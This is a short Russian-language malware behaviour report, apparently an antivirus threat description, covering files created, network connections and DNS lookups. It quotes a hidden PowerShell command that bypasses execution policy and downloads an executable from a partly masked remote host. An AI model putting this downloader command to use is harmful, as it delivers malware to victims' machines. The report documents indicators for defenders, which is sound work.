Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://mi###ihara.com//wp-content/themes/gaukingo/windowsapp.exe как %appdata%\windowsapp.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\windowsapp.exe
Сетевая активность
Подключается к
- '21#.#70.126.139':4660
TCP
Запросы HTTP GET
- http://mi###ihara.com//wp-content/themes/gaukingo/WindowsApp.exe
UDP
- DNS ASK mi###ihara.com
- DNS ASK pa###bin.com
Другое
Создает и запускает на исполнение
- '%APPDATA%\windowsapp.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mi###ihara.com//wp-content/themes/gaukingo/WindowsApp.exe','%APPDATA%\...' (со скрытым окном)
